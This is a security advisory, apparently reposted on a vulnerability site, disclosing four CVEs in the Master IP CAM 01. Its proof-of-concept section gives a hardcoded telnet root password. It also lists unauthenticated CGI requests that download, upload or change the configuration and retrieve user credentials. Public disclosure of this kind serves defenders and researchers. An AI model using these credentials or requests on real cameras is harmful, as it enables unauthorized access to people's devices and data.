Master IP CAM 01 Hardcoded Password / Unauthenticated Access

2018.01.18
Credit: Daniele Linguaglossa
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2018-5726 | CVE-2018-5723 | CVE-2018-5724 | CVE-2018-5725
CWE: N/A

# Exploit Title: Master IP CAM 01 Multiple Vulnerabilities # Date: 17-01-2018 # Remote: Yes # Exploit Authors: Daniele Linguaglossa, Raffaele Sabato # Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89 # Vendor: Master IP CAM # Version: 3.3.4.2103 # CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726 I DESCRIPTION ======================================================================== The Master IP CAM 01 suffers of multiple vulnerabilities: # [CVE-2018-5723] Hardcoded Password for Root Account # [CVE-2018-5724] Unauthenticated Configuration Download and Upload # [CVE-2018-5725] Unauthenticated Configuration Change # [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure II PROOF OF CONCEPT ======================================================================== ## [CVE-2018-5723] Hardcoded Password for Root Account Is possible to access telnet with the hardcoded credential root:cat1029 ## [CVE-2018-5724] Unauthenticated Configuration Download and Upload Download: http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi Upload Form: ### Unauthenticated Configuration Upload <form name="form6" method="post" enctype="multipart/form-data" action="cgi-bin/hi3510/restore.cgi" > <input type="file" name="setting_file" > <input type="submit" value="restore" > </form> ## [CVE-2018-5725] Unauthenticated Configuration Change Change configuration: http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080 List of available commands here: http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf ## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure Retrieve sensitive information: http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser III REFERENCES ======================================================================== http://syrion.me/blog/master-ipcam/ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726 http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf

References:

http://syrion.me/blog/master-ipcam/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726
http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top